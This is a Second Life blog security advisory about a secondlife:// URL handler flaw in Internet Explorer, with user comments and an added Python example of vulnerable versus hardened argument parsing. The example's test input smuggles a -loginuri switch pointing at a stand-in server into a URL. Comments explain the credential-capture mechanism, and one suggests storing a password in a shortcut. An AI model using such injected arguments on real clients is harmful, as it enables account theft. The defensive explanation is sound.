[RESOLVED] Second Life URL Handler Exploit

Note: This was resolved on the Public Issue Tracker, but never closed on the blog until now. Our apologies for any concern this untidy loose end may have caused. — teeple, 28 Mar 2008.

Due to a URL handler vulnerability, we advise not browsing unknown websites with Internet Explorer. Do not click on ‘secondlife://’ URLs on web pages with Internet Explorer or Internet Explorer based browsers. If Second Life starts without your intervention, please change your password on the secondlife.com site immediately.

To prevent this exploit prior to an official fix, un-check ‘Remember password’ in the login screen of the Second Life client and never log in unless you manually started Second Life yourself.

Second Life is configured to handle ‘secondlife://’ protocol URLs. Internet Explorer, and browsers based on Internet Explorer, pass all information from a src or href attribute straight through to the Second Life application when launching it. Using this, a malicious website can specify an iframe or anchor tag which redirects login through a server not under Linden Lab control.

We have a client side fix for this undergoing Quality Assurance. We expect to deploy the new 1.18.2.1 client this week and make it a required upgrade. Before the official client is available, the patch will be submitted to the sldev mailing list in the hopes that the open source developers can assist in making sure this unusually short turnaround from development to release is of high quality.

Firefox does not exhibit this behavior, and is not a vulnerable configuration on Windows.

Known affected configuration: Second Life 1.18.2.0 and earlier on Windows.
Mac: not vulnerable
Linux: not vulnerable

Another Workaround:

You can remove the association for the secondlife:// protocol until we release a fixed client by deleting the registry entry. This requires manual editing of your Windows registry, and is not for the faint of heart, and there is no implied or expressed warranty on following these instructions. However, it worked for me. Do the following at your own risk:

1. Run the ‘regedit’ program by clicking on the Start menu, clicking on ‘Run…’, entering regedit in the ‘Open:’ combo-box, and finally clicking ‘OK’.
2. Find HKEY_CLASSES_ROOT\secondlife\shell\open\command in the registry editor.
3. Right click on the ‘Default’ value in the rightmost pane and select Delete. At the confirmation alert box, click ‘Yes’ and close regedit.

The next time you install Second Life, the registry entry will be restored, so this is only a temporary workaround.
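As an added illustration (not Linden Lab's code or the viewer's), the following Python models the argument-handling weakness described above beside a hardened version that treats the single token after -url as the whole URL and ignores everything behind it. The -url, -loginuri and -autologin switch names are taken from the comments below, the argv lists are constructed inputs, and the default login endpoint is a placeholder.

```python
"""Added example, not Linden Lab code: a vulnerable and a hardened way for a
secondlife:// protocol handler to parse the argument list a browser builds.
Assumptions (not stated in the advisory): the client is launched as
  SecondLife.exe -url <secondlife://...>
and also understands -loginuri <server> and -autologin, as commenters on
this page describe. The argv lists below are constructed test inputs."""
from urllib.parse import unquote, urlsplit

# Placeholder for the client's built-in login endpoint (not the real value).
DEFAULT_LOGINURI = "https://login.default.example/"

# Constructed: what the client sees when a browser copies href text straight
# into the launch command and the shell splits it into separate tokens.
IE_STYLE_ARGV = ["-url", "secondlife://SomeRegion/128/128/0",
                 "-loginuri", "http://not-linden.example/", "-autologin"]

# Constructed: the same href after a browser that percent-encodes the whole
# attribute value, so the client receives it as a single token.
ENCODED_ARGV = ["-url",
                "secondlife://SomeRegion/128/128/0%20-loginuri%20http://not-linden.example/"]


def _defaults():
    return {"url": None, "loginuri": DEFAULT_LOGINURI, "autologin": False}


def parse_argv_naive(argv):
    """Weak parsing: every recognised switch is honoured wherever it appears,
    so switches that rode in behind the URL change where credentials go."""
    s = _defaults()
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok == "-url" and i + 1 < len(argv):
            s["url"] = argv[i + 1]
            i += 2
        elif tok == "-loginuri" and i + 1 < len(argv):
            s["loginuri"] = argv[i + 1]
            i += 2
        elif tok == "-autologin":
            s["autologin"] = True
            i += 1
        else:
            i += 1
    return s


def validate_slurl(raw):
    """Accept exactly one well-formed secondlife:// URL; reject anything that
    could only have come from injected text (whitespace, quotes, other schemes)."""
    url = unquote(raw)
    if any(ch.isspace() or ch in "\"'" for ch in url):
        raise ValueError("URL contains whitespace or quotes: %r" % raw)
    if urlsplit(url).scheme.lower() != "secondlife":
        raise ValueError("not a secondlife:// URL: %r" % raw)
    return url


def parse_argv_hardened(argv):
    """Hardened parsing: the single token after -url is the URL, every token
    after it is recorded and ignored, and a browser-initiated launch can never
    pick the login server or log in unattended (stricter than only ignoring
    trailing tokens, which is the fix the comments describe)."""
    s = _defaults()
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok == "-url":
            if i + 1 >= len(argv):
                raise ValueError("-url given without a value")
            s["url"] = validate_slurl(argv[i + 1])
            s["ignored"] = argv[i + 2:]   # logged for investigation, never acted on
            break
        elif tok == "-loginuri" and i + 1 < len(argv):
            s["loginuri"] = argv[i + 1]
            i += 2
        elif tok == "-autologin":
            s["autologin"] = True
            i += 1
        else:
            i += 1
    if s["url"] is not None:
        s["loginuri"] = DEFAULT_LOGINURI
        s["autologin"] = False
    return s


def hardened_accepts(argv):
    """True when the hardened parser accepts argv and the resulting launch
    neither changes the login server nor logs in without the user."""
    try:
        s = parse_argv_hardened(argv)
    except ValueError:
        return False
    return s["loginuri"] == DEFAULT_LOGINURI and not s["autologin"]


if __name__ == "__main__":
    for name, argv in (("IE-style", IE_STYLE_ARGV), ("encoded", ENCODED_ARGV)):
        print(name, "naive    ->", parse_argv_naive(argv))
        try:
            print(name, "hardened ->", parse_argv_hardened(argv))
        except ValueError as exc:
            print(name, "hardened -> rejected:", exc)
```

Run it to compare both parsers on the two constructed launches: the naive parser lets the IE-style argv redirect the login, while the single-token (Firefox-style) argv is harmless to it, which matches the advisory's note that Firefox is not affected.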

This entry was posted in Security.

101 Responses to [RESOLVED] Second Life URL Handler Exploit

  1. Lex Neva says:

    Some of us have chosen to stick with a pre-voice viewer for a few more major releases until all of the bugs and undesirable interface changes have been ironed out. There’s a community of users surrounding Nicholaz Beresford’s “Old School” viewer, which is based on 1.18.0.6 and includes a lot of bugfixes.

    I totally understand the need to get this exploit fix out ASAP, but I’m a bit upset that I’m going to be forced to switch to a voice viewer. Is it possible to make a 1.18.0.7 and a 1.18.2.1, both with this fix, and both mandatory? In other words, any viewer before 1.18.0.7 can’t log in, and any viewer before 1.18.2.1 can’t as well. I know I, for one, would appreciate this.

  2. Pol McLaglen says:

    Thank you for alerting us all to this exploit and for your quick action against it.

    Fortunately for me I use Firefox as my browser, as I do not trust Microsoft secondary software as far as I can spit upwind (hence my refusal to upgrade to Vista).

    Thanks again guys.

    Pol.

  3. Lex, Nicholaz has fudged version numbers before to avoid the optional update messages. Knowing him he might have a fix live before the lab. 😉

  4. red Dutton says:

    good thing i switched to Firefox since i had too many pop ups and hacks thru it :))
    red Dutton really likes Firefox now
    and hits the final delete on IE

    red Dutton can relax and browse with ease knowing Firefox is safe (for now and hopefully forever :))

  5. Mel says:

    SL is being extremely glitchy at the moment. My sim has crashed me 3 times in the last 15 min.. including a need to reboot the computer.
    I can’t move in there.

    Also.. could you take this information and put it in a way that someone without the computer vocabulary understands? Tell me what I should do.. not do.. in simple terms?

    Thanks

  6. Mel says:

    Does this mean we should not use our old method of getting into SL and that our short-cut icons are not to be used?

    Also.. why the new TOS? Could someone summarize what has changed in it?

  7. Do you think you can explain the exploit in a little more detail for curious minds? =^.^=

  8. RobbyRacoon says:

    The text above warns against clicking on “secondlife://” protocol urls, but kind of glosses over the fact that clicking such a link is not necessary for the exploit to work, since the exploit makes use of an IFRAME element that automatically “fires” off the link.

    But they did at least say that if the Second Life client starts up automatically, you should be concerned. I wonder, though…. How many people browse while the SL client is still running? I do, and I know several others that do. In such a case, wouldn’t they just get an unexpected map popup? Or would they even get that?

  9. Udge Watanabe says:

    Mel, you may not have seen that normal websites can have links to places in Second Life. This warning is about a way of maliciously redirecting such links. If you don’t use Windows, and if you do use Windows but not the Microsoft Internet Explorer, it doesn’t affect you.

    If you do use Internet Explorer, do NOT click on any link on the Web that claims to be sending you to Second Life, until this promised upgrade is ready and you’ve installed it. The start page will tell you when this is ready.

  10. SL Lykin says:

    I’d class myself as a n00b, so I’m damn glad I run the Linux version and it seems stable to me.

  11. Jabath Steuart says:

    Yeah, in case you hadn’t heard, IE still sucks at security. I wish people would stop using it, and I really wish developers would stop embedding it.

    And thank god for Nicholaz, I couldn’t use the horrible voice viewer UI if it wasn’t for him.

  12. TigroSpottystripes Katsu says:

    hey, what about releasing an optional (and explicitly unstable) client as well as a small program or something to unregister the dangerous protocols while a new stable viewer with the fix doesn’t come out?

  13. Robaato says:

    More technical details of the exploit at http://www.gnucitizen.org/blog/ie-pwns-secondlife

  14. Ameshin: More details (and link to what the exploit does specifically) are on my blog or on http://www.secondlifeinsider.com

    Lex: I’m sure there will be a way to keep Old School working 🙂

  15. Johnny Rambler says:

    Originally posted on the Second Citizen forums by Adam Zaius:

    You can disable it in the registry by deleting the URL handler for the secondlife:// protocol – it’s located in HKEY_CLASSES_ROOT\secondlife\shell\open\command — this is basically poor login arguments handling by LL – it should be ignoring everything after the -url argument.

    This may be a good work around until LL can figure out how to not use the -autologin argument. Expect a security update soon.

  16. Tamara says:

    Nobody wants voice, so you force it on us. Well done!!!

  17. Midnight Paragon says:

    Just remove the entry from the registry.

    Go to HKEY_LOCAL_MACHINE -> SOFTWARE -> Classes and scroll down to “secondlife” and delete it. You can also export the key if you want to add it back in later. After this, SL will not open from the secondlife:// protocol.

  18. Midnight Paragon says:

    Oops, forgot.

    Another thing you can do is temporarily add secondlife:// to the restricted sites list in IE and then it will prompt you before opening SL each time.

  19. Missy Malaprop says:

    I don’t get all the anti voice stuff or what it has to do with anything. The UI on the current viewer (w/voice) is fantastic, much better than the old one, and you can still have voice disabled… Is all the bickering just people who don’t like the UI changes that came with it? If your res is so low that the communicate window (which can be much smaller than older versions) is still too big, you need to get a real computer and not run in super low res like 800×600 and below… but even scaling mine down to 800×600 it’s still ok. I think the replies here need to be more about the security vulnerability and not about voice… they aren’t taking it back out.

  20. “we advise not browsing unknown websites with Internet Explorer”

    Personally, I advise not browsing -anything- with Internet Explorer. In fact, I advise against using Microsoft software in its entirety.
    If it’s not stability you want, at least do it for security!

  21. Listeel says:

    ‘Using this, a malicious website can specify an iframe or anchor tag which redirects login through a server not under Linden Lab control.’

    Uh, I’ve heard of a method of renting your own server and forcing the client to go to it, i.e. getting your own grid.

    Could this update be a disguise for ‘fixing’ that exploit?

    Meh, who knows…

    (I know absolutely nothing about how to do it, and have only heard it discussed, so LL don’t sue me =P )

  22. The XO says:

    Oh look…….

    Known affected configuration: Second Life 1.18.2.0 and earlier on Windows.
    Mac: not vulnerable
    Linux: not vulnerable

    Good job I’m running Ubuntu Linux 🙂 Shame the Linux client isn’t given the same dedication as the Windows one… oh well… enjoy your SLURLS…..

  23. Creem says:

    For once I’m glad that the Linux SL client has absolutely no built-in support for the secondlife:// handler! Now I’m just waiting for a vulnerability in the voice client code, so that I can feel glad about the Linux client not supporting that either! =P

  24. Jamie David says:

    What is very concerning is that this exploit has been there for such a long time. Since the beginning of SLURL. Not something new, just recently found out, that is all.

  25. Jessica Hultcrantz says:

    LOL

    Good old trustworthy M$oft has made it AGAIN 🙂

    Gees, use Firefox and you can still have the good old voicefree viewer installed…

    Or get a real computer, mac or linux based. Then we can talk security 🙂

  26. Atashi Toshihiko says:

    Yay Macintosh 🙂 For what it’s worth though I never have ‘remember password’ checked anyhow. The only thing that beats having a stable solid computer, is having a stable solid computer *and* being security conscious. 🙂

    As far as the ‘communicate’ window goes… it’s an eyesore. I want Friends and Groups and IMs as separate floaters like they used to be. Don’t understand why they all had to be rolled up into one big ugly box.

    Cheers!

  27. Jessica Elytis says:

    I want to echo #1’s post.

    Can we please have a Non-Voice viewer as well? Preferably without the new Communicate UI.

    Thanks
    ~Jessy

  28. Farallon Greyskin says:

    It is well known that LL has a personal hatred of IE.

    I sometimes wonder why they bother with a Windows client at all. But the original reporter confirmed that it DID happen with Firefox on Windows as well.

    Can you confirm that you have REconfirmed that it does not?

    And again this is far less than totally an IE/Microsoft exploit than it is a Second Life exploit for not checking for bad input data 😦

    How about taking at least 50% of the blame here as it takes two to tango with this exploit!

    And mac secure? OMG, Mac has had more security vulns in the last 2 years than anything else! You just never hear about them because Apple isn’t as “fun” to bash.

    Mac, Windows and Linux are ROUTINELY exploited. Anyone that thinks their platform is “secure” is more likely to get hit than anyone else.

  29. Prodigal Maeterlinck says:

    Firefox actually is vulnerable under this, but not as vulnerable, because at least it will warn you that an application is opening and prompt you to permit it. In that case it’d be user error or erroneous user that’s exploited.

  30. Relentless Roux says:

    my first comment in the comments section:
    Yet another reason to get a MAC!

  31. mimi says:

    “If your res is so low that the communicate window (which can be much smaller than older versions) is still too big, you need to get a real computer and not run in super low res like 800×600 and below… but even scaling mine down to 800×600 its still ok. I think the replies here need to be more about the security vulnerability and not about voice… they aren’t taking it back out.”

    the problems with the new screen aren’t all about the size. Why are the groups and friend list stuck together?

  32. Athena Whizenhunt says:

    The word exploit is bothersome to me, I run IE explorer because I am not really a computer person and it came with the package. I also would like more “plain language” about what this is and means.
    Are there any other unusual signs that I should be aware of? I watch what my computer does and am generally paranoid about it, so I might notice something happening, also if exploit means someone can look into my computer or something it doesn’t bother me as much as someone putting something in my stuff to crash or otherwise grieve me, more plain old details would work for me, I am good at understanding things, I just don’t know technical terminology.

  33. Voice:
    We will investigate making a special channel to keep the 1.18.0 branch alive with security patches.

    Things to look for:
    If Second Life is running and someone activates the url handler, the map will open unexpectedly but your login information is not compromised. If Second Life opens unexpectedly, then it is likely that someone is attempting to exploit this vulnerability.

    Firefox:
    I have been unable to reproduce this problem with firefox. Firefox takes everything in the src attribute and url-encodes it so that it appears as one parameter to the Second Life application.

  34. Don Misfit says:

    As far as I know, if you simply un-check the “Remember password” box on the SL login screen, this “exploit” is avoided (with all browsers on all platforms).

    Telling *any* software to record and auto-send your username/password combination is risky to begin with…

    ‘course, I may be wrong about this, but I don’t think so 🙂

  35. Schizm Neutra says:

    Thank you Mel! I am tech-challenged and do NOT understand what the hell this is all about! Isn’t it GREAT that all this happens AFTER my tier and membership fees are paid? NOW I prolly won’t be able to be on SL for the next few weeks, until I UNDERSTAND or someone ‘SPLAINS to me what is going ON!

    Pretend I’m from another PLANET, K? Tell me in KINDERGARTEN terms what I need to know…you guys ALWAYS do this to us…and if this diatribe offends the technologically astute…oh well, money is dumb, it goes to those who know what’s going on, and those who DON’T! Those who DON’T get to spend theirs toooo, K? Thank what ever God you believe in that we DO spend it here, cause guess what?

    It makes these ‘updates’ possible, K? Just EXPLAIN it to me…IM me if you must, but let me know what’s going onnnnn!

  36. Slartibartfast Magicthise says:

    I just have to wonder – how many times do people need to be hit in the head with a two-by-four before they move away from the Micro$oft lumberyard?

    Face it, M$ is the short-bus of the digital spectrum. Don’t let all the riders fool ya. Just because all your friends wear bike helmets and drink juice boxes doesn’t mean you have to too.

    Could this problem be linked to a redirecting I had in these days when SL gave me some notecard with a webpage to browse with IE7.0? In my processing of the Task Manager I saw a “not well identified” process I never saw, named about “LuCallback….proxy..”?
    Ty for reply
    E.P.

  38. Missy Malaprop says:

    not really true about “more” vulnerabilities in the last two years. True if you look at just the number, it’s bigger than MS Windows, but it includes a much much wider range of things than MS Windows numbers do, as the Apple numbers cover much more than just the OS.

    If going back to the car analogies, it’s like MS saying they had less security problems than Apple, yet they are only looking at the engine, where Apple is looking at the whole car.

  39. Ann Otoole says:

    ummm… how can someone on a different computer cause secondlife to unexpectedly open itself on your computer? that sounds really odd to me. is there something more to this exploit? is someone running a botnet engineered to infect computers with secondlife installed?

    many people were recommending use of this protocol as a workaround to the slurl and llMapDestination defect that causes random vector data to be used on first activation. Will you be fixing this defect now?
    http://jira.secondlife.com/browse/VWR-2060

  40. Missy Malaprop says:

    “thr problems with the new screen arent all about the size. Why are the groups and friend list stuck together?”

    that is sort of true, it would be nice to be able to tear away the friends list to keep it open and separate. I don’t mind it being together with group list, because there is really no point in ever leaving the group list open, but it would be nice to have the friends list open while still having the “Near Me” tab visible.

  41. Blinders Off says:

    Lex Neva wrote: “I totally understand the need to get this exploit fix out ASAP, but I’m a bit upset that I’m going to be forced to switch to a voice viewer.”

    I fully agree with this Lex. The 1.18.2 viewer is buggy as can be, with the result that I went back to 1.18– at which point the bugs disappeared. I hate the new interface (it’s much more difficult to use… where is the FRIENDS box, anyway?). I appreciate this patch is necessary, but like you, what good is the “you don’t have to upgrade unless you want to” if every other release, they’re forcing us to upgrade?

    Just more LL corporate poo….

  42. Melanie Milland says:

    Yes, please keep 1.18.0 alive! I’m on Linux – no voice yet, and being saddled with that atrocious UI _and_ not having the “benefit” of voice for it would be really bad.

    Unfortunately, there is no Linux build of the Nicholaz viewer that I know of.

  43. Erinsye Planer says:

    Hmmm, BEFORE you start praising FIREFOX, there are the SAME security issues with firefox as with ie. In fact more. Try picking up a copy of PC or Networking sometime. And YES this exploit affects firefox too.
    Oh and those of you that think a mac is less prone to exploits or viruses than a pc, need to wake up. There may be less viruses that target macs but they DO exist and they are FAR more devastating. oh, and Macs like ALL apple products are notoriously easy to hack. Really people. Educate yourselves before you open your traps to praise things you clearly have ZERO knowledge on.

  44. Henri Beauchamp says:

    PLEASE, DO NOT MAKE A _REQUIRED_ UPDATE !!!

    Many people are still using v1.18.0.6, because they hate the new UI you introduced in the voice viewers…

    I also use v1.18.0.6 myself, despite the patches I made to restore part of the old UI in v1.18.1 and later, because sometimes, it’s the only way to do things that the newer viewers can’t do (many interesting features were alas removed from the voice viewers, like “ALT shows physical”, for example) or where they got bugs (case of the “Update” button in the classifieds, which doesn’t show after a TP point update, for example).

    Plus, Linux and MAC users are not even affected by the exploit…

  45. Soo Novi says:

    Thank you for looking into making a voice-less viewer available with this mandatory fix. I have yet to see a voice client viewer that enables me to fly my avatars and saddles well, and on a lighter note – I don’t like the UI on the voice client either. I could live with the UI (if I had to) but I can’t function without my dragons on SL. If my dragons can’t fly I have no reason to log in.

  46. Erinsye Planer says:

    Oh about the interface, I find 1.18 much buggier than 1.81, the voice can be turned off and the UI is 1000 times more stable. As for the friends box, if renaming it Communicate confuses you, shut off your computer and get out of Second Life. There’s also the entire support website, the in-game help, Orientation Island, etc. that ALL teach you how to use the client. Seriously, if you can’t figure out how to use 1.18.1 or 1.18.2, get off Second Life because it’s obviously beyond your comprehension.

  47. Tamara says:

    THANKYOU PHOENIX!!!! So good to see someone is listening for once!

  48. Cocomo Munro says:

    hehe i use firefox & have a mac… guess I’m all good then? XD

  49. Sue Saintlouis says:

    First, like some others have said, let’s have the explanation of the problem in English…plain English!

    Second, let’s keep on topic.

    Third, how about a little respect? Why make the IE users, or Mac users, or anybody feel like they’re stupid?

  50. Joeymacaroni Vella says:

    I’ve been censored 4 times now on these blogs so I’ll see if this goes through. You guys at LL are the best, you’re smart and no one can surpass your great support. I love SL and all the Lindens. You are flawless. Great job!

  51. Sedary Raymaker says:

    we advise not browsing unknown websites with Internet Explorer.

    People still do that?!

  52. Vincent Nacon says:

    One point to FireFox and Zero point to IE.

    😉

  53. Chaz Longstaff says:

    >> Daedalus Young Says: Personally, I advise not browsing -anything- with Internet Explorer. In fact, I advise against using Microsoft software in its entirety. If it’s not stability you want, at least do it for security!

    I second that! I also steer clear out of Outlook — it’s a virus magnet.

  54. WADE1 Jya says:

    hehe i love it.

    Mac: Not Vulnerable

    Macs are awesome 🙂

  55. Wallaby says:

    I too appear to be technologically retarded. What in the bloody fruits does this mean!? Does this have anything to do with the fact that my account appears to have been completely corrupted within the past 24 hours? I mean, I can’t do anything! My avatar is stuck on child mode, I can’t teleport, I can’t access my inventory, I can’t even communicate with anyone. I do use IE, and up to this point, I had no idea the security sucked. Perhaps someone could tell me if the issues I have explained are attributed to this so called EXPLOITATION.

  56. Noctorne Nagy says:

    To those that have problems with the voice viewer:

    You can tear off the Near Me tab by hitting the little box in the corner and it will be exactly as it was pre voice.

  57. johnny says:

    hmmmm, if someone did manage to hack your account they wouldn’t be able to move anyway or take your cash. I want to know what you’re doing about your hardware; it can’t cope with the workload. Instead of complicating SL with fancy features, fix the SL we have now. Months of lag and it’s getting worse. You throw different suggestions at what the cause may be; thing is, from 4pm-4am UK time you can’t move, that’s every day, that’s when it hits 30-40k traffic. It is never going to get better and you bill me 900$ a month for it. Great.

  58. The communicate window I’ve actually gotten used to…so it’s no big deal to me. The friends list being in the IM window is quite annoying, however, it’s not the worst thing that’s happened to Second Life.

    Missy Malaprop Says:
    … but it would be nice to have the friends list open while still having the “Near Me” tab visible….

    Just click the small square in the corner that detaches Near Me from that window and close it. It then functions like the old History window used to, with only your friends / groups tacked onto the IM window.

  59. Sorry for double posting…but I forgot to say something in the last post. What about Safari 3 for Windows?

  60. Revolution Perenti says:

    SO Linux ^^ Microsoft always had so many problems with IE, which is why whenever i do use Windows it’s Firefox 😀

    Rev 🙂

  61. Mel says:

    Things to look for:
    If Second Life is running and someone activates the url handler, the map will open unexpectedly but your login information is not compromised. If Second Life opens unexpectedly, then it is likely that someone is attempting to exploit this vulnerability.

    ok…
    a) What is a url handler?
    Is it where you type in http:….
    Is the affected one different than the one you get by going to the SL website and signing up?
    Is it different than the one that forms as an icon so you dont have to sign in through http… every time?
    b) what map.. the map that shows the grid?

    Several of us do not have the technical knowledge to understand this vocabulary…altho it is always a challenge to understand it. Some definitions, please.

    When I tried to get on earlier when I kept getting frozen, logged out, etc etc.. I encountered a message about my agent being in another region.. what was that about?

  62. Quint says:

    This sounds very much like a bug which was fixed in the 2.0.0.6 version of Firefox (the most recent version, although 2.0.0.7 looks to be coming out very soon) If you are using an earlier version, you MAY still be vulnerable to this exploit, though I can’t confirm this for certain.

  63. Shadowen Silvera says:

    @1 I echo these sentiments exactly. Please find some way to not force us to upgrade to the unwieldy voice interface.

  64. Darkscorp Decatur says:

    Well,all I can say is Yay for FF!

  65. Damanios says:

    Quick ‘techno-challenged’ expo of the issue:

    1. What is a protocol-handler?
    Remember a website starts with http://. This way the browser knows to use the http protocol (webpage) to handle the url (the thing at the top of your browser). The browser itself handles http protocols, as it’s made to display webpages. Just like http://, IE and Firefox allow you to install ‘external protocol handlers’.
    This usually means the resulting url is being handed to a different application to process. Second Life installs such a handler to handle ‘secondlife://’ urls. So any url starting with ‘secondlife://’ will be automatically handed over by your browser to the Second Life client, which then tries to log in to the grid.

    Besides typing a url, it can be directly embedded in a website (all the links on a webpage are urls too). So you can put that ‘secondlife://’ url as a link in a webpage.
    The exploit uses this.

    But for it to actually compromise your pw, it uses a second part of the secondlife viewer: The ‘command parameters’. Extra commands you can type after the secondlife command, which allows you to configure stuff during startup of the client. like ‘-multiple’ to allow multiple clients open.

    2. The command parameter ‘-loginuri’:
    The -loginuri command makes the secondlife viewer send a message containing your name and (an encoded) pw to an external server, which is then meant to authenticate you so you have access to the SL grid. Normally it isn’t used, as SL will connect to the normal LL login servers to authenticate, but it’s provided to login to different grids (like opensim or beta grids etc.). In this case it’s simply used to grab the name/pw in the message and store them so people can use them to log in to your account.
    Although the password is encrypted, it’s being accepted by the ‘normal’ LL login servers in exactly the same manner, so the encryption doesn’t matter in this case.

  66. la le lu says:

    get linux. it also can play ogg theora video streams and other live stream formats that quicktime ignores. stable and less vulnerable to explorer exploits. i really hope that microsoft goes broke while they pay more and more penalties on court acts.

    haha, US$ 690mio, not as shares in real money! more!!!!

  67. Tracey Humphreys says:

    What! There are neanderthals out there still using IE? Get real, suckers… Firefox!

  68. Ron Crimson says:

    @ 46: Ron Crimson gives Erinsye a BIG hug.

    😀

    THANK YOU for speaking my mind!

  69. Missy Malaprop says:

    @43, Erinsye Planer …

    well good to know someone out there knows everything….

    **rolls eyes**

  70. Ravanne Sullivan says:

    What about those of us who do not use and do not wish to use the voice-enabled viewer? The voice-enabled viewer makes changes to the user interface that many of us do not want and adds a feature that we may not want or be able to use.

  71. Schizm Neutra says:

    Slartibartfast Magicthise Says

    IF I had the MONEY and the TECHNICAL help (read money) I tooo would be ‘moving away’ from an operating system that does strange and weird things to my computer, my life and my time…but…I’M POOR, sooo I’m STUCK with Microsoft and its attendant idiocy. THANKX for your understanding oh wise one! 😦

  72. cardinalsin says:

    No need to switch to a silly Mac. Just use Firefox, yo. :3

  73. Montana Corleone says:

    Yes please, I want to keep my Mac pre-voice viewer, I do not want a mandatory update to that horrid interface. Please in future releases, have an option that if you don’t want to use voice, you can go to old style comms boxes.

    If it doesn’t affect Mac, as usual, why have a mandatory?

  74. FD Spark says:

    Um my SL browser never remembers my password when I log in in world. Are they referring to something else?
    Personally I seldom use IE myself

  75. Archer Braun says:

    Yet another reason to be glad I have a Mac. Now…if SL could only plug the memory leaks that cause the mac client to do silly things like crash at logout, chew up CPU resources at insane levels, and generally act like a glue-sniffing teenager tweaking on a shot of crystal meth…then I’d be truly happy.
    But no…I think they’ll be introducing the amazing new outsourced “Smell” component.

    I can’t wait.

    Really.

  76. Yet more proof that IE blows teh goatse. Thanks for the warning LL, I’ll be sure to not use IE more than I do now. >)

  77. Cocoanut Koala says:

    What Schizm said.

    These things are very confusing to non-techy types like me. I’m surprised anybody like me still plays, what with these confusing warnings, and little information that is understandable to people like me.

    If you would say – HERE’S WHAT YOU MUST DO, RIGHT NOW – that would help. Apparently make sure the “remember password” is unchecked is the only thing I’ve gotten out of this scary message.

    But is that enough?

    I don’t know what a URL handler is, and I have no idea how I could open SL to log into it without doing it manually. How on earth do you manage that?

    It’s nice several posters in this thread laugh at everyone using IE, but – surprise, surprise – most of the world has not gotten the inside dope you technical maestros apparently have! I have both Firefox and I.E., and now I don’t know if I’m supposed to get rid of I.E. altogether or what.

    I pretty much have no idea what this whole blog entry means, except that I should be even more wary of logging onto SL than ever.

    Is my guess right? – that if I uncheck “remember password” I should be okay?

    Or is there something else I’m supposed to do?

    And finally, as several other posters have said – yes, please make the non-voice version always available. Before I got my new computer, it was virtually impossible to use. With my new computer, it just slows me down some. Either way, I’d rather not use it unless I have to for a specific event. (Plus the box is much less convenient than the old way, and takes up too much of the screen.)

    coco

  78. U M says:

    Strange how they are telling people to upgrade because of the breakin. Those that did not want it now are forced to do so. Why? Read between the lines……… So So typical!!!!!!!!!!!!!

  79. Sweet says:

    they closed the age verify blog but anyone wanting to see about the merge of teen and adult grid check this out http://slcreativity.org/blog/?p=32

    read down to the bottom part of the interview or you can watch the poor-quality video
    it’s coming, one grid =/

  80. Diomedes Nikolaidis says:

    Get rid of IE and Firefox both. Use the best of all browsers – Opera.

  81. U M says:

    44 Henri Beauchamp Says:

    September 18th, 2007 at 1:45 PM PDT
    “PLEASE, DO NOT MAKE A _REQUIRED_ UPDATE !!!

    Many people are still using v1.18.0.6, because they hate the new UI you introduced in the voice viewers…”

    It’s a great way to get everyone onto the one viewer, right? Geesh……… Everyone must have the voice viewer.

  82. Missy Malaprop says:

    One Viewer to rule them all, One Viewer to find them, One Viewer to bring them all and in the darkness bind them in the Land of Second Life where the Lindens lie.

  83. Dana Hickman says:

    I fully agree with #79. I DO NOT want that lame, resource hogging voice viewer… ever! Keep your exploit fix, thank you, and let me keep my pre-voice viewer.

  84. taff nouvelle says:

    Did anyone else notice that the TOS now says you are not allowed to use third-party viewers to access the SL grid? So much for open source.
    Also, if you lose anything from your inventory, that’s OK, LL are allowed to delete anything because they now own it all. Everything you make or buy is owned by LL. hmmm

  85. I would strenuously recommend this: “Voice: We will investigate making a special channel to keep the 1.18.0 branch alive with security patches.” The problem is not with voice itself. I need to keep my IM and my chat history open, but the voice viewer makes the minimum height of the IM window 1/4 of my screen (1600×1200 resolution); that is, to put it bluntly, unusable. A mandatory shift to the voice viewer’s UI will cripple my ability to function in world.

  86. Marv Rayner says:

    The most troublesome aspect of this to me is making 1.18.2.0 mandatory. I have no problems with voice and will probably use it in the future, but I cannot stand the thought of having to deal with the abomination that is the Communicate UI. Despite its name, it is much clunkier than the previous IM, Friends, and Group windows; it actually makes communicating more difficult than before, as well as eating a large chunk of valuable screen real estate. Please give those of us who have experienced the Communicate UI and refused to upgrade to it a way around it. And please allow those of us who have upgraded and hate it (my backup computer) a way to install a version without it.

  87. Chaos Mohr says:

    “Firefox actually is vulnerable under this, but not as vulnerable, because at least it will warn you that an application is opening and prompt you to permit it. In that case it’d be user error or erroneous user that’s exploited.”

    Hmmm, IE7 in Vista does the same thing: it warns you that an application is opening and prompts you to permit it. It all comes down to running security in your browsers, no matter what the browser or the platform. If you use old technology, or disregard common security precautions, you will leave yourself vulnerable.

    Now, while they have said that if you already have SL up and running on your Windows machine this vulnerability will not pass your encrypted data, what if the command switch to run multiple copies of SL is passed?

  88. mimi says:

    What kind of patches have you made henri? To add the old viewer in a new secondlife?

    It sounds very interesting!

    if you do please sell them and we will buy them!

  89. Tod69 Talamasca says:

    I read about this exploit yesterday or earlier today- I forget.

    Link: http://www.heise-security.co.uk/news/96163

  90. Sierra says:

    The vulnerability in URL handlers like this has been known for a few weeks now…. Were you testing it to see if SecondLife was also vulnerable these last few weeks?

  91. U M says:

    @ 89 everyone knew this would happen. Many called for safety measures. But LL didn’t pay any attention until someone caused this problem to be noticed. A little too late as always, don’t you think?

  92. void singer says:

    ::desperately misses the old UI for multiple reasons: new is too blocky, IM now tied to new oversized Communicate, loss of “alt shows…”, etc::

    for those that still want the old saved-password function, but not the vulnerability, try modifying a shortcut to SecondLife to the following:

    “C:\Program Files\SecondLife\SecondLife.exe” -login first last password

    change first, last and password to your own info
    this will connect you automatically to whatever your location is set to, skipping the info page. IF YOU WANT THE INFO PAGE, DON’T DO THIS!

    if you hate that it redetects your hardware EVERY time, add -noprobe before -login (by itself this won’t cause you to skip the info page)

    if you want to make it log into a specific location, add -url secondlife://region/x/y/z to the end

    replace region and x/y/z with the sim name and coordinates. you can use this w/o the others to set your login location and still keep the info page

    example:

    “C:\Program Files\SecondLife\SecondLife.exe” -noprobe -login your name password -url secondlife://ahern/128/128/0

    IMPORTANT NOTE: anyone that clicks on the shortcut can see your password if you specify it, so you probably shouldn’t do this if you share your desktop with another user. dunno what the equivalent for Mac users is; linux users can obviously figure out the difference

    – Void

  93. Sofia Westwick says:

